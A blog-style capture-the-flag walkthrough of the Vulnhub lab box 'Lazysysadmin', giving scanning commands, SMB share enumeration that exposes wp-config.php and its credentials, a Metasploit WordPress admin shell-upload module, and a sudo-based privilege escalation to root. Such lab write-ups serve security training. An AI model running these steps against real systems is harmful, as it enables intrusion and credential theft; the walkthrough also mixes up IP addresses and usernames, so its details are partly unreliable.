Lazysysadmin: 1 Full Walkthrough From Vulnhub

Introduction

In this post, You will learn how to CTF the lazysysadmin box from vulnhub and there is also a video format of the post, Check it out ????????

To download Lazysysadmin [Click here]

Video

Hacking phases in Lazysysadmin

  • Scanning
  • Enumeration
  • Exploitation
  • Privilege escalation

Let’s hack Lazysysadmin

Follow the steps carefully and if there is any kind of error or the box is not working you are free to text me on discord, click below to join my discord community ????????

Discord: https://discord.gg/rmW5eWsjhR

Advertisement

Finding target IP

To find the target IP just enter sudo arp-scan -l or net discover command

sudo arp-scan -l

In my case the target IP is 192.168.64.16

Nmap scan

Now, Let’s do the Map scan to find the open Ports and the service and version to do that just enter the below command.

nmap -p- -sV 192.168.64.16

SMB/CIFS enumeration

As we have port 139 and port 445 is open, so we use smbclient: smbclient is a client that can ‘talk’ to an SMB/CIFS server) to look for the shared disk.

smbclient -L 192.168.64.16
smbclient  '\\192.168.1.16\share$'
get deets.txt
get todo list.txt

In ‘share$’ we found WordPress folder as well as three txt files named deets.txt, robots.txt and todolist.txt.   

Looking further into the ‘WordPress’ folder that we have found earlier, we found the wp-config.php file. Let’s download it.

cd wordpress\ 
get wp-config.php

If we take a look at the wp-config.php file we could find the password.

Username: Admin 
Password: TogieMYSQL12345^^

Advertisement

Login to wordpress

Now we have found the username and the password of the WordPress let’s enter them and login to WordPress.

Username: Admin 
Password: TogieMYSQL12345^^

Exploitation

Now, We have successfully logged in to WordPress let’s exploit the vulnerability and get the user access.

Let’s use metasploit to exploit the flaws.

use exploit/unix/webapp/wp_admin_shell_upload 
set rhosts 192.168.1.16 
set targeturi /wordpress 
set username admin 
set password TogieMYSQL12345^^ 
exploit

We have got the meterpreter access let’s do privilege escalation.

Privilege escalation

Firstly, let’s enter shell in the meterpreter so that we can access the shell. Then we do cat /etc/passwd to check for the pass file.

Now enter as stogie user, by just entering su bogie and entering the password 12345 and then enter sudo -l and then just enter sudo su to get the root access.

Now just do ls and then grab the flag.

shell
cat /etc/passwd
su bogie
password: 12345
sudo -l
password: 12345
sudo su
cd /root
ls 
cat proof.txt

Conclusion

According to me the box is pretty much very easy, Out of 10 I will be giving a rating of 3 out of 10.

See ya guys in next CTF post ????

Advertisement


Also Read: How to CTF the Nullbyte from Vulnhub